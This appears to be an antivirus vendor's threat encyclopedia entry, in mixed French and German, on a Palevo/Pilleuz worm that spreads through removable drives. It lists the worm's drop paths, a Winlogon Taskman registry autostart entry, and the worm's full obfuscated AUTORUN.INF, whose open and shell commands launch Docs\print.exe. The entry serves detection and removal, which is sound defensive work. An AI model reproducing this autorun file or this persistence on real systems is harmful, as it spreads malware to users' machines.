Analysé par: Christopher Daniel So   
 

VirTool:Win32/VBInject.gen!CU (Microsoft); W32.Pilleuz (Symantec); P2P-Worm.Win32.Palevo.lrs, P2P-Worm.Win32.Palevo.lrs (Kaspersky); Backdoor.Sdbot.DGDK (FSecure); Troj/VBDrop-P (Sophos); Worm.Win32.Palevo.mwz (v) (GFI-Sunbelt); W32/Kolab.HQL!worm (Fortinet); W32/Worm.AXRV (exact) (FProt); Worm/Palevo.lrs.4 (AntiVir); W32/Worm.AXRV (Authentium); Worm.P2P.Palevo-12 (ClamAV); P2P-Worm.Win32.Palevo (Ikarus); Trojan W32/VBTroj.CEPA (Norman); I-Worm.Palevo.lrs (Quickheal); Trojan-Dropper.VB.Clare (VBA32)

 Plate-forme:

Windows 2000, Windows XP, Windows Server 2003

 Overall Risk:
 Dommages potentiels: :
 Distribution potentielle: :
 reportedInfection:
Faible
Medium
Élevé
Critique

  • Type de grayware:
    Worm

  • Destructif:
    Non

  • Chiffrement:
    Non

  • In the wild::
    Oui

  Overview

Legt eine AUTORUN.INF-Datei ab, um automatisch die eingeschleusten Kopien auszuführen, wenn ein Benutzer auf die Laufwerke eines betroffenen Systems zugreift.

  Détails techniques

File size: Varie
File type: PE
Memory resident: Oui
Date de réception des premiers échantillons: 14 avril 2010

Installation

Schleust die folgenden Eigenkopien in das betroffene System ein:

  • %System Root%\RECYCLER\{random SID}\{random file name}.exe

(Hinweis: %System Root% ist der Stammordner, normalerweise C:\. Dort befindet sich auch das Betriebssystem.)

Schleust die folgenden Dateien ein:

  • %System Root%\RECYCLER\{random SID}\Desktop.ini - non-malicious files

(Hinweis: %System Root% ist der Stammordner, normalerweise C:\. Dort befindet sich auch das Betriebssystem.)

Autostart-Technik

Fügt folgende Registrierungseinträge hinzu, um bei jedem Systemstart automatisch ausgeführt zu werden.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon
Taskman = "%System Root%\RECYCLER\{random SID}\{random file name}.exe"

Verbreitung

Schleust folgende Kopie(n) von sich selbst in alle Wechsellaufwerke ein:

  • {drive letter}:\Docs\print.exe

Legt eine AUTORUN.INF-Datei ab, um automatisch die eingeschleusten Kopien auszuführen, wenn ein Benutzer auf die Laufwerke eines betroffenen Systems zugreift.

Die besagte .INF-Datei enthält die folgenden Zeichenfolgen:

[autorun
;OEP
open=.\Docs\print.exe
;??
:cmp
;tg
icon=%System Root%\system32\SHELL32.dll,4
:jmp3
;ü?g?ÝYwb??F?]L??CìF?mö?fò=?V÷ÍìTÿ
action=Open folder to view files using Windows Explorer
;?dë???a?s???éü?Y??;`äw??X???L
shell\\\\open\\command=Docs////print.exe
:jne1
;?oÍjBv?è?|??
shell\\explore\\\\command=.\\Docs/print.exe
;ñ=T???L?AÑ???ÈxÖ
;;;;;;;;;;;;;
useautoplay=1
;à`Q??
;(?s??
[autorun]
:goto fuckavg

(Hinweis: %System Root% ist der Stammordner, normalerweise C:\. Dort befindet sich auch das Betriebssystem.)

  Solutions

Moteur de scan minimum: 8.900
Participez à notre enquête!